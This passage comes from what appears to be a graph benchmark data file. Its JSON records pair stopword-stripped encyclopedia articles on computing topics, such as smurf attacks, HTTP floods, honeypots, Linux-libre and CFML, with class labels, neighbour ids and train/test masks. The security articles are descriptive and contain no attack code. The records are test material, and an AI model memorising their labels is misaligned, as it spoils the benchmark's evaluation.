andover mount holyoke college goddard college u.s merchant marine academy bates college dartmouth club new york dartmouth affiliate jersey city new jersey sharing dtss dartmouth people basic change system remained compatible older applications kemeny reported 1974 programs written 1964 would still run system allowed email-type messages passed users real-time chat via precursor unix talk program 1980 supported languages systems included 2000 project recreate dtss system simulator undertaken result dtss available microsoft windows systems apple macintosh computer",
    "neighbors": [
      512,
      6675,
      7187,
      10776,
      25,
      8732,
      4637,
      9762,
      5158,
      557,
      7217,
      9784,
      10809,
      576,
      8262,
      1610,
      1611,
      9804,
      9298,
      10333,
      97,
      6242,
      8298,
      6772,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150,
      2179,
      10883,
      6797,
      9366,
      6296,
      7325,
      9887,
      10400,
      3248,
      6837,
      4799,
      8388,
      9932,
      5840,
      7382,
      8410,
      1253,
      5363,
      2811,
      3323,
      10499,
      1804,
      273,
      11539,
      10016,
      2345,
      7983,
      8499,
      8502,
      823,
      4409,
      7483,
      11075,
      4423,
      10569,
      5457,
      11601,
      10590,
      6502,
      8551,
      5492,
      4985,
      6529,
      394,
      3978,
      7057,
      11667,
      8092,
      421,
      9644,
      11184,
      6075,
      6078,
      9151,
      8136,
      2519,
      11229,
      6128,
      5619,
      10235
    ],
    "mask": "None"
  },
  {
    "node_id": 4493,
    "label": 3,
    "text": "Linux-libre:linux-libre linux-libre operating system kernel gnu package gnu project attempts keep linux-libre synchronization upstream development linux kernel removing software include source code source code obfuscated released proprietary license software components available source code called binary blobs mostly used proprietary firmware images linux kernel generally redistributable binary blobs give user freedom audit modify consequently redistribute modified versions linux kernel started include binary blobs 1996 work clear binary blobs began 2006 gnewsense find-firmware gen-kernel work taken blag linux distribution 2007 deblob linux-libre born linux-libre first released free software foundation latin america fsfla endorsed free software foundation fsf valuable component totally free linux distributions became gnu package march 2012 alexandre oliva project maintainer removal process achieved using script called deblob-main script inspired one used gnewsense jeff moe made subsequent modifications meet certain requirements use blag linux gnu distribution another script called deblob-check used check kernel source file patch compressed sources file still contains software suspected proprietary aside primary intended effect running system free software practical consequences removing device firmware user allowed study modify positive negative effects advantages include removal device firmware audited bugs security problems malicious operations backdoors fixed linux kernel maintainers even know possible entire system compromised malicious firmware without ability perform security audit manufacturer-provided firmware even innocent bug could undermine safety running system downside removing proprietary firmware kernel cause loss functionality certain hardware free software replacement available affects certain sound video tv tuner network especially wireless cards well devices possible free software replacement firmware provided substitute openfwwf b43 carl9170 ath9k_htc wireless card drivers source code precompiled packages deblobbed linux kernel available directly distributions use linux-libre scripts freed-ora subproject prepares maintains rpm packages based fedora also precompiled packages debian derived distributions ubuntu distros n't use packaged linux-libre instead completely deblob proprietary linux kernel tools make linux-libre source compiled resulting free linux kernel used default systems distributions linux default kernel used propose linux-libre alternative kernel",
    "neighbors": [
      2560,
      2050,
      1028,
      4616,
      3082,
      5644,
      5139,
      9237,
      6680,
      10780,
      4637,
      10785,
      3618,
      6180,
      9257,
      2044,
      1584,
      8242,
      9266,
      9780,
      59,
      4161,
      4673,
      7234,
      8258,
      6213,
      8262,
      5703,
      8772,
      10817,
      10822,
      8268,
      589,
      593,
      2134,
      1112,
      3162,
      3674,
      2658,
      10851,
      6244,
      5222,
      10856,
      107,
      6763,
      10860,
      4207,
      8304,
      5244,
      11388,
      4734,
      5759,
      11391,
      2180,
      7812,
      4230,
      8326,
      9865,
      7821,
      4238,
      10382,
      657,
      2195,
      2711,
      6808,
      9882,
      6301,
      1694,
      3744,
      2723,
      4265,
      9899,
      8364,
      2224,
      10933,
      5815,
      2233,
      5822,
      5824,
      11232,
      4803,
      1736,
      5833,
      2762,
      8909,
      6352,
      3289,
      3802,
      8410,
      10971,
      4831,
      7904,
      1761,
      8928,
      10464,
      2278,
      233,
      3817,
      4841,
      7403,
      9964,
      7920,
      6898,
      5363,
      8436,
      10482,
      2294,
      8439,
      2809,
      7938,
      4360,
      1291,
      4367,
      1813,
      5397,
      792,
      2332,
      10012,
      10016,
      802,
      5410,
      295,
      1833,
      815,
      6962,
      5430,
      823,
      6968,
      7992,
      7483,
      318,
      3395,
      3911,
      6988,
      10063,
      4437,
      5975,
      11095,
      3422,
      863,
      8033,
      2914,
      9579,
      6508,
      7020,
      10091,
      1394,
      1396,
      7540,
      8573,
      1406,
      3458,
      7555,
      900,
      8066,
      11654,
      5514,
      10127,
      1939,
      11155,
      9621,
      1431,
      8602,
      11678,
      1952,
      7584,
      1444,
      1445,
      9637,
      935,
      10149,
      4521,
      4011,
      11180,
      9646,
      1456,
      5555,
      1972,
      9148,
      9660,
      10687,
      9667,
      4040,
      457,
      5067,
      4561,
      8147,
      2010,
      477,
      9696,
      2529,
      1506,
      6625,
      8673,
      2021,
      8676,
      9190,
      5096,
      1513,
      8171,
      10732,
      1007,
      3055,
      5105,
      1524,
      2036,
      5620,
      8186,
      3068
    ],
    "mask": "Test"
  },
  {
    "node_id": 4494,
    "label": 4,
    "text": "Default_Credential_vulnerability:default credential vulnerability default credential vulnerability type vulnerability commonly found affect devices like modems routers digital cameras devices pre-set default administrative credentials access configuration settings vendor manufacturer devices uses single pre-defined set admin credentials access device configurations potential hacker misuse fact hack devices credentials changed consumers several proof-of-concept poc well real world worms running across internet configured search systems set default username password voyager alpha force zotob myspooler examples poc malware scans internet specific devices try login using default credentials real world many new malware including mirai using vulnerability using compromised devices carrying distributed denial service ddos attacks one particular incident hacker able gain access control large number networks including university maryland baltimore county imagination capital market strategies l leveraging fact using default credentials netgear switch",
    "neighbors": [
      612,
      5636,
      2409,
      1803,
      11198,
      3807
    ],
    "mask": "None"
  },
  {
    "node_id": 4495,
    "label": 4,
    "text": "Smurf_attack:smurf attack smurf attack distributed denial-of-service attack large numbers internet control message protocol icmp packets intended victim spoofed source ip broadcast computer network using ip broadcast address devices network default respond sending reply source ip address number machines network receive respond packets large victim computer flooded traffic slow victim computer point becomes impossible work original smurf.c written dan moschuk aka tfreak late 1990s many ip networks would participate smurf attacks prompted would respond icmp requests sent broadcast addresses name comes idea small numerous attackers overwhelming much larger opponent see smurfs today administrators make network immune abuse therefore networks remain vulnerable smurf attacks fix two-fold another proposed solution network ingress filtering rejects attacking packets basis forged source address example configuring router forward packets broadcast addresses cisco router smurf amplifier computer network lends used smurf attack smurf amplifiers act worsen severity smurf attack configured way generate large number icmp replies victim spoofed source ip address fraggle attack variation smurf attack attacker sends large amount udp traffic ports 7 echo 19 chargen ip broadcast address intended victim spoofed source ip address works similarly smurf attack many computers network respond traffic sending traffic back spoofed source ip victim flooding traffic source code attack also released tfreak",
    "neighbors": [
      2947,
      6667,
      2960,
      11413,
      5402,
      933,
      939,
      1965,
      6834,
      2240,
      6735,
      3024,
      849,
      4689,
      10852,
      2408,
      2409,
      8692,
      2299
    ],
    "mask": "Test"
  },
  {
    "node_id": 4496,
    "label": 4,
    "text": "Gordon–Loeb_model:gordon–loeb model gordon–loeb /ˈgȯr-dən ˈlōb/ model mathematical economic model analyzing optimal investment level information security investing protect company data involves cost unlike investments usually generate profit however serve prevent additional costs thus important compare expensive protect specific set data potential loss case said data stolen lost damaged corrupted draft model company must possess knowledge three parameters much data worth much data risk probability attack data going successful last parameter gordon loeb defined vulnerability product said parameters provides medium money loss security investment model gather amount money company spends protecting information cases small fraction predicted loss example expected value loss following security breach specifically model shows generally inconvenient invest informatics security including cybersecurity computer security related activities amounts higher 37 predicted loss gordon–loeb model also shows specific level potential loss amount resources invest order protect information set always increase increase vulnerability said set thus companies enjoy greater economic returns investing cyber/information security activities aimed increase security data sets medium level vulnerability words investment safeguarding company data reduces vulnerability decreasing incremental returns example suppose estimated data value 1.000.000 euros attack probability 15 80 chance attack would successful case potential loss given product 1.000.000 euros x 0.15 x 0.8 120.000 euros according gordon loeb company investment security exceed 120.000 euros x 0.37 44.000 euros gordon–loeb model first published lawrence a. gordon martin p. loeb 2002 paper acm transactions information system security entitled economics information security investment paper reprinted 2004 book economics information security gordon loeb professors university maryland robert h. smith school business gordon–loeb model one well accepted analytical models economics cyber/information security literature model widely referenced academic practitioner literature model also empirically tested several different settings research mathematicians marc lelarge yuliy baryshnikov generalized results gordon–loeb model gordon–loeb model featured popular press wall street journal financial times",
    "neighbors": [
      2750,
      5373,
      2558,
      5636
    ],
    "mask": "Test"
  },
  {
    "node_id": 4497,
    "label": 4,
    "text": "Gardening_(cryptanalysis):gardening cryptanalysis cryptanalysis gardening act encouraging target use known plaintext encrypted message term used british government code cypher school bletchley park england world war ii schemes entice germans include particular words british called cribs encrypted messages term presumably came raf minelaying missions gardening sorties gardening standard raf slang sowing mines rivers ports oceans low heights possibly sea area around european coasts given code-name flowers vegetables technique claimed effective messages produced german navy enigma machines germans recently swept particular area mines analysts bletchley park need cribs might apparently several occasions request area mined would hopefully evoke encrypted messages local command mentioning minen german mines and/or location perhaps messages also headquarters minesweeping ships assign location mentioning worked often enough try several times crib-based decryption example chosen-plaintext attack plain text effectively chosen british injected ciphertext",
    "neighbors": [
      9156,
      1941,
      11119
    ],
    "mask": "None"
  },
  {
    "node_id": 4498,
    "label": 4,
    "text": "HTTP_Flood:http flood http flood type distributed denial service ddos attack attacker manipulates http post unwanted requests order attack web server application attacks often use interconnected computers taken aid malware trojan horses instead using malformed packets spoofing reflection techniques http floods require less bandwidth attack targeted sites servers http flood http clients web browser interact application server send http requests request either “ get ” “ post ” aim attack compel server allocate many resources possible serving attack thus denying legitimate users access server resources get request used retrieve static content like images typically induces relatively low load server per request post requests likely require server perform kind processing looking items database therefore http post flood attacks typically impose higher load server per request http flood attacks use standard url requests hence quite challenging differentiate valid traffic one effective mitigation methods combination traffic profiling methods mainly includes identification ip reputation tracking abnormal actions employing progressive sanctuary challenges",
    "neighbors": [
      225,
      2947,
      10756,
      6347,
      7515,
      5884
    ],
    "mask": "Test"
  },
  {
    "node_id": 4499,
    "label": 2,
    "text": "FFADO:ffado free firewire audio drivers ffado project provide open-source drivers firewire sound interfaces linux project began freebob driver specifically firewire audio devices based technology made bridgeco use interface named bebob current version allows devices accessed via jack audio connection kit jack following presentation paper 2007 linux audio conference outlining future project march 26 2007 announced project would renamed ffado drivers rewritten include support firewire audio chipsets",
    "neighbors": [
      2908,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 4500,
    "label": 4,
    "text": "Computer_Online_Forensic_Evidence_Extractor:computer online forensic evidence extractor computer online forensic evidence extractor cofee tool kit developed microsoft help computer forensic investigators extract evidence windows computer installed usb flash drive external disk drive acts automated forensic tool live analysis microsoft provides cofee devices online technical support free law enforcement agencies cofee developed anthony fung former hong kong police officer works senior investigator microsoft internet safety enforcement team fung conceived device following discussions 2006 law enforcement technology conference sponsored microsoft device used 2,000 officers least 15 countries case cited microsoft april 2008 credits cofee crucial new zealand investigation trafficking child pornography producing evidence led arrest april 2009 microsoft interpol signed agreement interpol would serve principal international distributor cofee university college dublin center cyber crime investigations conjunction interpol develops programs training forensic experts using cofee national white collar crime center licensed microsoft sole us domestic distributor cofee november 6 2009 copies microsoft cofee leaked onto various torrent websites analysis leaked tool indicates largely wrapper around utilities previously available investigators microsoft confirmed leak however spokesperson firm said anticipate possible availability cofee cybercriminals download find ways ‘ build around significant concern device activated plugged usb port contains 150 tools graphical user interface help investigators collect data software reported made three sections first cofee configured advance investigator selecting data wish export saved usb device plugging target computer interface generates reports collected data estimates cited microsoft state jobs previously took 3–4 hours done cofee little 20 minutes cofee includes tools password decryption internet history recovery data extraction also recovers data stored volatile memory could lost computer shut mid late 2009 tool named detect eliminate computer acquired forensics decaf announced uninvolved group programmers tool would reportedly protect computers cofee render tool ineffective alleged would provide real-time monitoring cofee signatures usb devices running applications cofee signature detected decaf performs numerous user-defined processes included cofee log clearing ejecting usb devices contamination spoofing mac addresses december 18 2009 decaf creators announced tool hoax part stunt raise awareness security need better forensic tools",
    "neighbors": [
      6916,
      2437,
      7968,
      9377,
      5284,
      11182,
      4789,
      1975,
      8635,
      830,
      2494,
      6475,
      4049,
      4834,
      5475,
      7525,
      5990,
      9319,
      7411
    ],
    "mask": "Test"
  },
  {
    "node_id": 4501,
    "label": 2,
    "text": "Cdist:cdist cdist free software configuration management tool unix-like systems manages nodes ssh using bourne shell require additional software installed target nodes cdist differentiates competing configuration management systems choosing bourne shell primary language writing configuration scripts requiring effectively dependencies target nodes although cdist core written python interpreter required host machine target nodes cdist development started 2010 eth zurich actively developed maintained primarily nico schottelius steven armstrong major part discussion cdist happens mailinglist irc channel cstar freenode network cdist used various companies switzerland eth zurich oma browser project us germany france cdist zero dependency configuration management system requires ssh bourne-compatible shell target hosts provided default unix-like machines cdist used bootstrap configuration management systems cdist typically installed package like .deb .rpm rather via git commands run created checkout entry point configuration shell script conf/manifest/init called initial manifest cdist terms main components cdist called types bundle functionality types essentially consists number shell scripts define types type reuses code generated executed target host cdist split two components cdist core handles reading configuration communicating remote hosts like ansible cdist uses push model apply configuration changes cdist process host machine connects number remote nodes via ssh performs configuration updates nodes cdist configure multiple hosts parallel reduce time spent configuring configuration scripts define targets shall configured typically written bourne shell consists shell de facto language writing cdist configuration scripts scripts written language contain suitable shebang line shell scripting favored simple access environment variables read files execute system commands user configurable parts contained manifests gencode-scripts shell scripts shell scripts chosen unix system administrators usually proficient reading writing shell scripts furthermore shell also commonly available potential target systems thus avoiding need install additional software zero dependencies cdist reads configuration initial manifest conf/manifest/init hosts mapped types using types cdist called like normal programs manifests make use advanced parameter parsing well reading stdin dependencies expressed setting require environment variable access paths files within types given environment variables like ansible like cdist uses agentless push model configure nodes however ansible normally requires python targets whereas cdist ansible makes distinction roles written declarative yaml-based language modules written python cdist types serve purposes modules roles mostly written bourne shell cdist approach might preferrable shell familiar many system administrators never used configuration management system ansible declarative language arguably readable appropriate",
    "neighbors": [
      10341,
      8554,
      7983,
      11632,
      5397,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 4502,
    "label": 1,
    "text": "CSQL:csql csql open source main memory high-performance relational database management system developed sourceforge.net designed provide high performance sql queries dml statements disk i/o in-memory databases provide predictive response time suited real time near real time applications something called datablitz described 1998 project called dbcache done ibm presented 2004 c. mohan configured work transparent cache database management systems mysql postgresql circa 2009 version 3.3 released 2011 promoted company called lakshya bangalore existed 2013",
    "neighbors": [
      10921,
      10413,
      7022,
      7983,
      3323,
      10286,
      3219,
      8539
    ],
    "mask": "None"
  },
  {
    "node_id": 4503,
    "label": 4,
    "text": "Client_honeypot:client honeypot honeypots security devices whose value lie probed compromised traditional honeypots servers devices expose server services wait passively attacked client honeypots active security devices search malicious servers attack clients client honeypot poses client interacts server examine whether attack occurred often focus client honeypots web browsers client interacts servers part client honeypot example ftp ssh email etc. several terms used describe client honeypots besides client honeypot generic classification honeyclient term generally used accepted however subtlety honeyclient actually homograph could also refer first known open source client honeypot implementation see although clear context client honeypot composed three components first component queuer responsible creating list servers client visit list created example crawling second component client able make requests servers identified queuer interaction server taken place third component analysis engine responsible determining whether attack taken place client honeypot addition components client honeypots usually equipped sort containment strategy prevent successful attacks spreading beyond client honeypot usually achieved use firewalls virtual machine sandboxes analogous traditional server honeypots client honeypots mainly classified interaction level high low denotes level functional interaction server utilize client honeypot addition also newly hybrid approaches denotes usage high low interaction detection techniques high interaction client honeypots fully functional systems comparable real systems real clients functional limitations besides containment strategy exist high interaction client honeypots attacks high interaction client honeypots detected via inspection state system server interacted detection changes client honeypot may indicate occurrence attack exploited vulnerability client example change presence new altered file high interaction client honeypots effective detecting unknown attacks clients however tradeoff accuracy performance hit amount system state monitored make attack assessment also detection mechanism prone various forms evasion exploit example attack could delay exploit immediately triggering time bombs could trigger upon particular set conditions actions logic bombs since immediate detectable state change occurred client honeypot likely incorrectly classify server safe even though successfully perform attack client finally client honeypots running virtual machines exploit may try detect presence virtual environment cease triggering behave differently capture high interaction client honeypot developed researchers victoria university wellington nz capture differs existing client honeypots various ways first designed fast state changes detected using event based model allowing react state changes occur second capture designed scalable central capture server able control numerous clients across network third capture supposed framework allows utilize different clients initial version capture supports internet explorer current version supports major browsers internet explorer firefox opera safari well http aware client applications office applications media players honeyclient web browser based ie/firefox high interaction client honeypot designed kathy wang 2004 subsequently developed mitre first open source client honeypot mix perl c++ ruby honeyclient state-based detects attacks windows clients monitoring files process events registry entries integrated capture-hpc real-time integrity checker perform detection honeyclient also contains crawler seeded list initial urls start continue traverse web sites search client-side malware honeymonkey web browser based ie high interaction client honeypot implemented microsoft 2005 available download honeymonkey state based detects attacks clients monitoring files registry processes unique characteristic honeymonkey layered approach interacting servers order identify zero-day exploits honeymonkey initially crawls web vulnerable configuration attack identified server reexamined fully patched configuration attack still detected one conclude attack utilizes exploit patch publicly released yet therefore quite dangerous shelia high interaction client honeypot developed joan robert rocaspana vrije universiteit amsterdam integrates email reader processes email receives urls attachments depending type url attachment received opens different client application e.g browser office application etc monitors whether executable instructions executed data area memory would indicate buffer overflow exploit triggered approach shelia able detect exploits able actually ward exploits triggering spycrawler developed university washington yet another browser based mozilla high interaction client honeypot developed moshchuk et al 2005 client honeypot available download spycrawler state based detects attacks clients monitoring files processes registry browser crashes spycrawlers detection mechanism event based increases passage time virtual machine spycrawler operating overcome rather reduce impact time bombs wef implementation automatic drive-by-download – detection virtualized environment developed thomas müller benjamin mack mehmet arziman three students hochschule der medien hdm stuttgart summer term 2006 wef used active honeynet complete virtualization architecture underneath rollbacks compromised virtualized machines low interaction client honeypots differ high interaction client honeypots utilize entire real system rather use lightweight simulated clients interact server browser world similar web crawlers responses servers examined directly assess whether attack taken place could done example examining response presence malicious strings low interaction client honeypots easier deploy operate high interaction client honeypots also perform better however likely lower detection rate since attacks known client honeypot order detect new attacks likely go unnoticed also suffer problem evasion exploits may exacerbated due simplicity thus making easier exploit detect presence client honeypot honeyc low interaction client honeypot developed victoria university wellington christian seifert 2006 honeyc platform independent open source framework written ruby currently concentrates driving web browser simulator interact servers malicious servers detected statically examining web server ’ response malicious strings usage snort signatures monkey-spider low-interaction client honeypot initially developed university mannheim ali ikinci monkey-spider crawler based client honeypot initially utilizing anti-virus solutions detect malware claimed fast expandable detection mechanisms work started diploma thesis continued released free software gpl phoneyc low-interaction client developed jose nazario phoneyc mimics legitimate web browsers understand dynamic content de-obfuscating malicious content detection furthermore phoneyc emulates specific vulnerabilities pinpoint attack vector phoneyc modular framework enables study malicious http pages understands modern vulnerabilities attacker techniques spybye low interaction client honeypot developed niels provos spybye allows web master determine whether web site malicious set heuristics scanning content clamav engine thug low-interaction client honeypot developed angelo dell'aera thug emulates behaviour web browser focused detection malicious web pages tool uses google v8 javascript engine implements document object model dom important unique features thug activex controls handling module vulnerability module static dynamic analysis capabilities using abstract syntax tree libemu shellcode analyser thug written python gnu general public license yalih yet another low interaction honeyclient low interaction client honeypot developed masood mansoori honeynet chapter victoria university wellington new zealand designed detect malicious websites signature pattern matching techniques yalih capability collect suspicious urls malicious website databases bing api inbox spam folder pop3 imap protocol perform javascript extraction de-obfuscation de-minification scripts embedded within website emulate referer browser agents handle redirection cookies sessions visitor agent capable fetching website multiple locations bypass geo-location ip cloaking attacks yalih also generate automated signatures detect variations attack yalih available open source project minic low interaction client honeypot based wget retriever yara engine designed light fast suitable retrieval large number websites minic allows set simulate referer user-agent accept_language variables minic designed new zealand honeynet chapter victoria university wellington hybrid client honeypots combine low high interaction client honeypots gain advantages approaches honeyspider network hybrid client honeypot developed joint venture nask/cert polska surfnet projects goal develop complete client honeypot system based existing client honeypot solutions crawler specially bulk processing urls",
    "neighbors": [
      3555,
      7364,
      9256,
      4585,
      1785,
      7482
    ],
    "mask": "None"
  },
  {
    "node_id": 4504,
    "label": 4,
    "text": "HTTP_tunnel:http tunnel http tunneling used create network link two computers conditions restricted network connectivity including firewalls nats acls among restrictions tunnel created intermediary called proxy server usually located dmz tunneling also allow communication using protocol normally ’ supported restricted network common form http tunneling standardized http connect method mechanism client asks http proxy server forward tcp connection desired destination server proceeds make connection behalf client connection established server proxy server continues proxy tcp stream client initial connection request http server simply proxies established tcp connection mechanism client behind http proxy access websites using ssl tls i.e https proxy servers may also limit connections allowing connections default https port 443 whitelisting hosts blocking traffic n't appear ssl client connects proxy server requests tunneling specifying port host computer would like connect port used indicate protocol requested connection allowed proxy connected specified host proxy return 2xx success response client proxied remote host data sent proxy server forwarded unmodified remote host client communicate using protocol accepted remote host example client starting ssh communications hinted port number initial connect request http tunnel also implemented using usual http methods post get put delete similar approach used bidirectional-streams synchronous http bosh special http server runs outside protected network client program run computer inside protected network whenever network traffic passed client client repackages traffic data http request relays data outside server extracts executes original network request client response request sent server repackaged http response relayed back client since traffic encapsulated inside normal get post requests responses approach works proxies firewalls",
    "neighbors": [
      11392,
      8998,
      5608,
      9834,
      9868,
      10924,
      5749,
      4725,
      4797
    ],
    "mask": "None"
  },
  {
    "node_id": 4505,
    "label": 3,
    "text": "Windows_Server_2016:windows server 2016 windows server 2016 server operating system developed microsoft part windows nt family operating systems developed concurrently windows 10 first early preview version technical preview became available october 1 2014 together first technical preview system center windows server 2016 released september 26 2016 microsoft ignite conference became generally available october 12 2016 two successors windows server 2019 windows server semi-annual channel excludes graphical user interface many older components windows server 2016 variety new features including microsoft announced new installation option nano server offers minimal-footprint headless version windows server excludes graphical user interface wow64 support 32-bit software windows installer support console login either locally via remote desktop connection management performed remotely via windows management instrumentation wmi windows powershell remote server management tools collection web-based gui command line tools however technical preview 5 microsoft re-added ability administer nano server locally powershell according microsoft engineer jeffrey snover nano server 93 lower vhd size 92 fewer critical security advisories 80 fewer reboots windows server nano server available microsoft software assurance customers cloud computing platforms microsoft azure amazon web services starting new feature release windows server version 1709 nano server installed inside container host microsoft reorganized satya nadella putting server system center teams together previously server team closely aligned windows client team azure team also working closely server team march 2017 microsoft demonstrated internal version server 2016 running armv8-a architecture reported microsoft working qualcomm centriq cavium thunderx2 chips according james vincent verge decision endangers intel dominance server cpu market however later inquiry microsoft revealed version windows server internal use impacts subscribers microsoft azure service public beta version windows server 2016 still called vnext branded windows server technical preview released october 1 2014 technical preview builds aimed toward enterprise users first technical preview first set expire april 15 2015 microsoft later released tool extend expiry date last second tech preview os may 2015 second beta version technical preview 2 released may 4 2015 third preview version technical preview 3 released august 19 2015 technical preview 4 released november 19 2015 technical preview 5 released april 27 2016 windows server 2016 insider preview build 16237 released windows insiders july 13 2017 windows server 2016 officially released microsoft ignite conference september 26 2016 unlike predecessor windows server 2016 licensed number cpu cores rather number cpu sockets—a change similarly adopted biztalk server 2013 sql server 2014 new licensing structure adopted windows server 2016 also moved away windows server 2012/2012r2 cpu socket licensing model amount cores covered one license limited windows server 2016 standard datacenter core licensing covers minimum 8 core licenses physical processor minimum 16 core licenses server core licenses sold packs two standard edition providing familiar rights run 2 virtualized os environments server goes 16 core licenses 2 processor server additional licenses required windows server 2016 windows server 2016 technical preview released october 1 2014 first beta version operating system made publicly available version number 6.4.9841 windows server 2016 technical preview 2 made available may 4 2015 version number 10.0.10074 similar jump significant part version number 6 10 seen windows 10 highlights version include third technical preview windows server 2016 made available august 19 2015 version number 10.0.10514 highlights version include fourth technical preview operating system made available november 19 2015 one year one month initial technical preview version number 10.0.10586 highlights include last technical preview windows server 2016 made available april 27 2016 version number 10.0.14300 highlights include windows server 2016 released manufacturing september 26 2016 bearing version number 10.0.14393 windows 10 anniversary update microsoft added following final touches windows server version 1709 based windows 10 fall creators update released october 17 2017 release dropped windows server 2016 name called windows server microsoft offered microsoft software assurance customers active windows server 2016 license system requirements first windows server product fall semi-annual channel sac release cadence product features server core nano server modes two server core mode os installed bare system nano server mode available operating system container windows server version 1803 based windows 10 april 2018 update second semi-annual channel release windows server also final version branched server 2016 codebase next release shares version number 1809 windows server 2019",
    "neighbors": [
      6150,
      6153,
      6675,
      11283,
      9762,
      11301,
      6697,
      1581,
      64,
      582,
      1608,
      1098,
      4174,
      7248,
      8798,
      2656,
      10338,
      8296,
      5225,
      10344,
      8299,
      6768,
      7796,
      6265,
      8315,
      636,
      639,
      641,
      2179,
      9863,
      651,
      6797,
      10896,
      2193,
      2196,
      2713,
      9375,
      4771,
      3250,
      9910,
      9420,
      10957,
      2777,
      3289,
      4316,
      9438,
      9442,
      4326,
      3303,
      9448,
      1260,
      3820,
      5356,
      9964,
      10989,
      5363,
      4353,
      8976,
      3857,
      11030,
      6438,
      6441,
      7983,
      3890,
      3894,
      5435,
      6462,
      321,
      9539,
      2887,
      847,
      11605,
      2391,
      3927,
      4439,
      1885,
      2910,
      10079,
      11103,
      2919,
      6514,
      8576,
      10624,
      3463,
      1418,
      3978,
      5003,
      1935,
      8080,
      7057,
      10132,
      4508,
      929,
      4515,
      8103,
      3496,
      9646,
      11184,
      10675,
      9655,
      440,
      1978,
      7615,
      7106,
      3535,
      9173,
      8159,
      5600,
      4074,
      3053,
      5103,
      3573
    ],
    "mask": "Train"
  },
  {
    "node_id": 4506,
    "label": 6,
    "text": "Ext2Fsd:ext2fsd ext2fsd short ext2 file system driver free installable file system driver written c microsoft windows operating system family facilitates read write access ext2 ext3 ext4 file systems driver installed windows 2000 windows xp windows server 2003 windows vista windows 7 windows 8 windows 10 windows server 2008 windows server 2008 r2 support windows nt dropped version 0.30 program ext2mgr optionally installed additionally manage drive letters april 2019 main web site ext2fsd.com gone dark german computer magazine pc-welt reported frequent program crashes 2009 program able access ext3 partitions smoothly often led blue screen crashes type lead data loss example yet permanently stored data main memory program could access ext2 partitions without errors 2012 computerwoche warned access ext3 partitions harmless data loss may occur warning issued release version 0.69 n't use ext2fsd 0.68 earlier versions latest ubuntu debian systems ext2fsd 0.68 process ext4 64-bit mode enabled could corrupt data sorry disaster issue 'm working improvement unclear whether v0.69 corrects deficiency",
    "neighbors": [
      6434,
      9762,
      4074,
      8298,
      6413,
      6797,
      7663,
      7983,
      5969,
      8976,
      3859,
      1844,
      2197,
      246,
      2199,
      9335,
      11184,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4507,
    "label": 9,
    "text": "ColdFusion_Markup_Language:coldfusion markup language coldfusion markup language commonly known cfml scripting language web development runs jvm .net framework google app engine multiple commercial open source implementations cfml engines available including adobe coldfusion lucee new atlanta bluedragon offer java-based .net-based version railo open bluedragon well cfml server engines simplest form like many web scripting languages cfml augments standard html files database commands conditional operators high-level formatting functions elements produce web applications cfml also includes numerous constructs including coldfusion components cfcs cfml version objects allow separation business logic presentation cfml written using either tags cfscript resembles javascript ecma script pages cfml application include server-side cfml tags functions addition html tags modern cfml applications also tend cfcs accessed cfml pages executing business logic web browser requests page coldfusion application automatically pre-processed coldfusion application server cfml also used generate languages aside html xml javascript css despite name cfml markup language also sgml since certain core cfml features prevent complying cfml engine configured way certain file extensions server .cfm .cfc handed cfml engine processing case java-based engines accomplished via java servlets cfml engine processes cfml tags functions returns text outside cfml tags functions web server unchanged named cold fusion outset software created 1995 allaire corporation originally located minnesota later moved cambridge massachusetts finally newton massachusetts acquired macromedia 2001 allaire cold fusion thus became macromedia cold fusion release version 4 space name removed become coldfusion adobe acquired macromedia 2005 still actively developing coldfusion 1998 alan williamson scottish company n-ary began creating templating engine java simplify common programming tasks williamson using curly-brace notation instead tags saw example cfml solving similar problems although java using tag syntax started developing would eventually become bluedragon first java implementation cfml language coldfusion written c c++ version 6.0 — first java-based version coldfusion — released 2002 new atlanta licensed bluedragon around 2001 made available commercial product eventually creating .net implementation cfml open bluedragon fork commercial bluedragon product first released 2008 railo cfml engine began student project 2002 first launched commercial project 2005 railo announced making engine open source 2008 first open source version released 2009 june 18 2009 adobe announced cfunited conference formed cfml advisory committee would responsible guiding reviewing changes cfml language effort disbanded 2010 google group cfml conventional wisdom created forum open public discussions language engine features use dwindled since 2011 2012 opencfml foundation launched function push open-source cfml applications platforms former railo lead developer michael offner launched lucee fork railo london january 29 2015 backed community supporters members lucee association goal project provide functionality cfml using fewer resources giving better performance move cfml past roots modern dynamic web programming platform cfml tags similar format html tags enclosed angle brackets generally zero named attributes though tags e.g cfset cfif contain expression rather attributes many cfml tags bodies beginning end tags text processed example tags cfset cfftp never bodies required information goes beginning character ending character form tag attributes name/value pairs example legal tags body syntactically acceptable leave unclosed first example though many cfml developers choose self-close tags second example arguably make code legible even tag body including body may necessary instances attributes specify required information cases second example end tag hence tag body may omitted tag may self-closing following example various tags offer ability type-check input parameters e.g cffunction cfparam cfqueryparam programmer declares type specifically functionality used cfqueryparam secure web applications databases hackers malicious web requests sql injection nearly 100 tags many functions make heart cfml language following lists cfml tags function purpose cfml allows language extensions form custom tags tags created developer part cfml language custom tags regular cfml files intended invoked tags although possible treat template custom tag regular template custom tags written cfml typically invoked prefixing custom tag file name cf_ although ways invoke custom tags template invoked custom tag attributes used invoke tag available within tag attributes scope variables calling page accessible via caller scope example writing custom tag perform addition taking two attributes adding together tag would addition.cfm file could look like assuming tag directory file pre-defined customtags directory invoked thus cfx tags custom tags developed using java c++ prefixed cfx_ like cf_ java c++ tags added cfml runtime environment using cfml engine administrator editing configuration files cfml engines jsp tags also included cfml pages using cfimport tag coldfusion markup language includes set functions use perform logical arithmetic operations manipulate data cfcs provide typical features functionality provided object-oriented oop languages create cfc cfcs plain cfml within cfc cfml tag function custom tag components etc may used cfcs used various ways method contained cfc simply needs invoked cfinvoke tag create instance cfc invoke desired method destroy instance cfc cfinvoke takes name component minus .cfc extension method execute access returned data returnvariable attribute provides name variable contain whatever function returns cfcs created using four tags saved .cfc files invoked using cfinvoke tag example component temperature.cfc method ftoc converts temperature fahrenheit celsius test.cfm template invokes method converts 212 degrees fahrenheit outputs result cfcs may also instantiated objects assuming cfc file called person.cfc instance cfc would instantiated follows cfcs also form basis ability create web services cfml cfc created usual way attribute access= remote added function within cfc make function available called soap-based web service cfml engine auto-generates wsdl creates necessary stubs web service function",
    "neighbors": [
      9345,
      2946,
      899,
      3462,
      10506,
      3469,
      9618,
      148,
      8854,
      155,
      5917,
